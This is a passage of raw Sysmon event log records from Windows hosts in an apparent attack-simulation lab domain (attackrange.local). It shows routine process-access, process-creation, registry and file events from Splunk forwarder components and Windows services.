08:03:51.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:51.957{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F767-60EB-C67D-00000000CF01}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F767-60EB-C67D-00000000CF01}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.942{466BC892-F767-60EB-C67D-00000000CF01}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001053148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.768{466BC892-F767-60EB-C57D-00000000CF01}89206332C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.729{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06ADD1D11D5D0A696E4218D27FB574B0,SHA256=D4DB0205E214B537876909D7455806B8786B784DEF60453F56FD4252DB0D7583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:51.307{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5170B8DF643F95C462179AC25E7B869,SHA256=1F2141DE98A1B3C2F89CDF44E64A2D4FFDF21D1458B3E1C584110DE860395E58,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.637{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-710B-00000000CF01}6496C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.637{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-0667-60E8-7503-00000000CF01}5036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F767-60EB-C57D-00000000CF01}8920C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:51.366{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:51.366{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F767-60EB-C57D-00000000CF01}8920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F767-60EB-C57D-00000000CF01}8920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.352{466BC892-F767-60EB-C57D-00000000CF01}8920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.135{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2A11D8CD71D2735E052EA95B3DB0645,SHA256=60F4581AF32E56C741E1F292DB0036561F8DA5CAFB1C3C61CFAF7D073473C937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:51.133{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=885EA53639B482B89CA8B87293F77C81,SHA256=16D96374D3EB6953615332385FD2CBDF0CB0C61F4B8D3CDF9DEBF53446C8D4E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:49.167{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57412-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 13241300x80000000000000001053170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:52.909{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001053169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:52.905{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001053168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:52.905{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 
10341000x80000000000000001053167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F768-60EB-C77D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:52.809{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:52.809{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F768-60EB-C77D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F768-60EB-C77D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.804{466BC892-F768-60EB-C77D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=113A4B37FE81F515DEC11492DF45EB67,SHA256=AB2686075AAD4F2A22778F7626BB453A73002EEC2D6F4F1BF85F54400DD37834,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:52.322{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D7727B440512273C99A6A50365AA3C,SHA256=EB5B50454C94873C2DFA1FAF41F1408E1210331C8CC10DECCA943C00DA56E462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.357{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2A11D8CD71D2735E052EA95B3DB0645,SHA256=60F4581AF32E56C741E1F292DB0036561F8DA5CAFB1C3C61CFAF7D073473C937,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.290{466BC892-F767-60EB-C67D-00000000CF01}101526852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 